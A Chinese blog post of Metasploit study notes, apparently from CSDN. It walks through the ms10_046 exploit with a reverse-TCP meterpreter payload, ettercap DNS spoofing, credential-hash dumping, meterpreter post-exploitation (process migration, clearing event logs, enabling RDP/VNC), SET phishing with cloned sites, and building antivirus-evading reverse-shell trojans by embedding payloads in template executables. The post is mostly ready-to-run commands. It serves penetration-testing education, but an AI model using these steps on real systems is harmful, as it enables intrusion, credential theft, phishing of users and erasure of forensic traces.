菜鸟腾飞MSF

已于 2022-12-26 13:06:57 修改
阅读量790 收藏 3
点赞数
分类专栏: 笔记 文章标签: VPS
于 2019-01-16 11:24:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/imtech/article/details/86504751
版权

菜鸟腾飞Metasploit Framework

渗透测试介绍

渗透测试 penetration testing
PTES:Penetration Testing Execution Standard

  1. 前期交互阶段
  2. 情报收集阶段
  3. 威胁建模阶段
  4. 漏洞分析阶段
  5. 渗透攻击阶段
  6. 后渗透攻击阶段
  7. 报告阶段
    渗透测试类型
    白盒测试
    黑盒测试
    灰盒测试

Metasploit Framework基础知识

专业术语介绍

exploit 渗透攻击
payload 攻击载荷
shellcode 攻击后代码

接口及启动方式

msfconsole msf终端
msfcli msf命令行接口
armitage 图形化用户接口

实例讲解

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
渗透攻击/系统/浏览器/快捷方式漏洞
set srvhost ip
set payload windows/meterpreter/reverse_tcp
set lhost ip
#setg lhost ip 将变量值设置为全局参数
show options
exploit
配合dns欺骗,让被动攻击变成主动攻击
/user/local/share/ ettercap
vi etter.dns
*.com A 192.168.1.102
*.net A 192.168.1.102
*.cn A 192.168.1.102

ettercap T -q -I interface -P dns_spoof // // # // 网段 // mac地址段
达到欺骗效果后可以把dns欺骗关闭。
可以在被欺骗客户端用tcpview监视工具看到进程里多了一个rundll32.exe进程

sessions
查看回话
sesions -I 1
meterpreter>
这下面命令以后讲解
输入shell可以进入客户端的shell

metasploit下的辅助扫描工具

port scan:auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/syn
set rhosts ip
show options
exploit

smb scan:auxiliary/scanner/smb/smb_version
通过smb信息判断操作系统版本,语言,计算机名等信息。
ftp scan:auxiliary/scanner/ftp/ftp_login
SQLServer:auxiliary/scanner/mssql/mssql_login
SQLServer:auxiliary/scanner/mssql/mssql_hashdump
在知道了sqlserver的用户名密码以后的就可以获得服务器上其他账户的账户信息提取出来,然后进行破解。
密文可以去cmd5网站进行破解。
参数都是大写,设置时使用大写可以tab自动补全,小写也可以设置成功,但是没有自动不全功能。

PostgreSQL数据库的使用

利用数据库可以保存结果,自动化攻击,与别人一起共享结果。

  1. 安装postgresql,kali里已经默认安装好。
  2. 安装pgadmin3,图形管理数据库。
    apt-get install pgadmin3
    安装完毕后运行pgadmin3,启动图形界面。
  3. 创建账号sudo -u postgres createuser tengfei
    sudo -u postgres psql postres
    \password tengfei
    设置tengfei用户密码
  4. metasploit下使用数据库
    db_status 查看数据库状态
    db_connect 连接数据库
    db_disconnect 断开数据库
    workspace 工作空间命令
    连接到数据库以后使用,开辟空间。
    连接到数据库以后才可以使用类似db_nmap的命令。
    workspace可以创建多个空间,用于保存不同的扫描结果和场景。

自动化攻击

自动化扫描结果入库:db_nmap -sV -O -v -T 5 IP
hosts
命令查看存入数据库的host
载入自动化模块:load db_autopwn
4.2以后的版本自动攻击模块被分离出来了,现在的版本需要将db_autopwn模块上传到插件目录中,并且载入。
插件:db_autopwn.rb
放到/usr/share/metasploit-framework/plugins
载入自动化模块:load db_autopwn
db_autopwn -h
查看帮助
根据数据库扫描结果匹配漏洞尝试渗透攻击:db_autopwn -e -t -r -p
当发现有一个sessions的时候就可以停止了。
vulns 在数据库中查看所有漏洞信息。

Meterpreter介绍

在使用渗透攻击以后,得到meterpreter会话。
可以通过help来看一下帮助信息
background 把session放到后台,切换回来的命令 session -i 1
migrate迁移会话到指定pid
当得到控制权以后,会有一个进程比如rundll32.exe在任务管理器中能看到,不利于隐藏。
也叫进程注入,在转移前通过ps命令查看进程列表,得到pid号码。
可以把会话注入到ctfmon.exe(输入法进程),migrate 1824。
迁移过去以后通过TCPView工具查看时会看到:2056….
就是也给不存在的进程,而且进程是结束不掉的。
clearev 清除系统事件(擦脚印)
getpid 查看当前会话pid
getuid 获取当前shell的用户权限
kill 结束指定进程
shell 进入windows的cmd shell,可以输入cmd下的命令。
从shell退回到merterpreter会话,使用ctrl+z
sysinfo 获取系统信息
screenshot 截屏并保存
getsystem 提升权至system权限

run脚本,run也是meterpreter里的一个命令,可以运行一些脚本或文件。
可以通过run 空格,两次tab键,可以看到所有可以执行的脚本。
常用的:
run hashdump 获取系统账户hash密码,执行前先要getsystem提权
通过hash值可以通过彩虹表破解密码;
run post/windows/gather/enum_applications 获取系统安装程序
run post/windows/manage/enable_rdp 开启rdp
run vnc 用vnc控制对方桌面,自动上传vnc插件并反弹端口,一般不会被杀毒软件查杀(需要图形界面下msfconsole运行)
run winenum 运行windows常用枚举信息,集成好多命令,收集信息。
run packetrecorder -i l 开启抓包,捕获数据到本地,可以使用Wireshark工具进行分析。

社会工程学SET攻击

set配置文件:/pentest/exploits/set/config/set_config
APACHE_SERVER=ON #apache启动
SELF_SIGNED_APPLET=ON #自签名
AUTO_DETECT=ON #自动攻击
MAIL项建议关闭
SET是一款社会工程学攻击工具包,可以与metasploit紧密结合。

在metasploit下监听端口:

  1. Java Applet演示
    打开SET—1.Social-Engineering Attacks—2.Website Attack Vectors—1.Java Applet Method—2.Site Clone,输入签名信息,输入克隆的目标站点,选择payload,就是在欺骗成功以后运行的payload,选2 Windows Reverse_TCP Meterpreter,选择encodings (考虑免杀功能 ),针对国外的杀毒软件免杀效果比较好,但是国内的效果不好。
    会自动打开apache,等待用户链接过来,可以同时配合dns欺骗或其他社工方法比如邮件方式欺骗用户打开网站,会弹出一个java applet窗口,运行的话就会中招。
  2. 克隆站点钓鱼攻击
    打开SET,1社会工程学攻击–2web站点攻击—3钓鱼攻击—2克隆站点(只有部分站点可以被伪造的界面抓取密码下来)
  3. 综合攻击
    1–2–7–
    可以结合多种攻击方式被动攻击。会针对所有漏洞生成不同的攻击界面,在访问者访问的时候只问一个,set会自动判断用户的浏览器或者漏洞类型,匹配相应的漏洞,加载相应的页面。会自动迁移进程。

Metasploit离线式攻击

创建包含payload模块的二进制文件
msfpayload windows/shell/reverse_tcp LHOST=本地ip LPORT=本地端口443 X > /tmp/xxx.exe
就是一个反弹型木马

在模板文件(未加壳,pe结构中包含.text表)中插入payload(就是在一个文件的基础上插入payload)
这个模板文件有条件,1,文件不能加壳,2,pe结构中得有.text表
可以用peid工具扫描文件信息
msfpayload windows/shell/reverse_tcp LHOST=本地ip LPORT=本地端口443 R | msfencode -t exe -x /tmp/模板文件.exe -o /tmp/目标生成文件.exe -e x86/shikata_ga_nai -c 5
在Metasploit下监听端口:(可以一直开着,监听一个端口,不同的人连接进来都不会出错)
msf>use exploit/multi/hander
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>exploit

加壳以后原来文件功能可能会受影响。
将Metasploit接入互联网

  1. 通过live cd 引导系统,使用pppoe拨号获得公网ip;
  2. 租用一台装有Ubuntu或其他Linux系统的VPS
  3. 租用一台拥有多ip的服务器,在服务器上安装VMWare虚拟机。
    个人想法,可以在防火墙上做端口映射,也可以获得公网ip。
骆驼1024
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
使用msf攻击时开启端口监听的工具和命令
geniusChinaHN的博客
01-18 420
使用use 命令的时候需要打开这个东西输入,其他窗口输入无效。
Windows网络服务渗透测试实战-MSF恶意程序利用
c_lanxiaofang的博客
05-20 4121
一、实验项目名称 Windows网络服务渗透测试实战-MSF恶意程序利用 二、实验目的及要求 掌握对MSF恶意程序利用的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 对安卓msf上线进行图标隐藏,pc上线自行进行操作截图 一、Android端 1、查看kali的IP 192.168.43.89 2、生成一个apk文件到桌面 命令中的lhost为kali系统的IP,lport为监听端口,此处设置9988 msfvenom -p and.
msf命令
qq_52469895的博客
05-19 2149
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
cc123489ll的博客
05-09 1138
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
附录一.msf常见案例
potato123232的博客
08-04 280
成功之后你就会获得用户名与密码(我用马赛克挡上了),获得了ssh我们就可以随便操作该机器的文件了,你可以使用putty。虽然PASS_FILE与USER_FILE显示的都不是必选参数,但是如果你不写就会报错,我动的是下面这三个参数。他们彼此可以ping通,从虚拟机ping到0网段的其他机器也可以ping通,但是到使用一些东西的时候就不行了。我把用户名与密码都放在两个文本文件的第一位了,我们直接看成功了之后我们可以怎么做。我们发现我们什么都没用扫描出来,但我们并非什么都没做,我们看一下服务端的日志。
metasploit(MSF)渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1925
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
MSF内网渗透实战
hackzkaq的博客
05-17 3804
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
msf命令全集
06-05
MSF 命令全集 MSF(Metasploit Framework)是一款功能强大且功能丰富的渗透测试工具,提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:...
MSF使用1
xhscxj的博客
06-12 3428
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5083
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
msfconsole后渗透指令
Yu3511606536的博客
02-26 2111
msfconsole后渗透利用
Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面
m0_46161993的博客
07-01 5284
问题描述   分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。   由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。 解决办法 在msfconsole中使用命令: use exploit/windows/smb/ms08_06
MSF---端口扫描
weixin_46297209的博客
09-26 2725
msf端口扫描以及与数据库的联动
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
关于kali个人笔记
weixin_57140106的博客
04-15 675
Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443). 关于msfconsole 443端口号被占用的解决方法
msf脚本
05-24
MSF(Metasploit Framework)是一个开源的安全漏洞检测和攻击的工具包,它可以帮助安全研究人员和渗透测试人员进行漏洞探测、漏洞利用和后渗透测试等多种操作。MSF中的脚本是一种自动化的攻击工具,可以快速地执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

骆驼1024

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值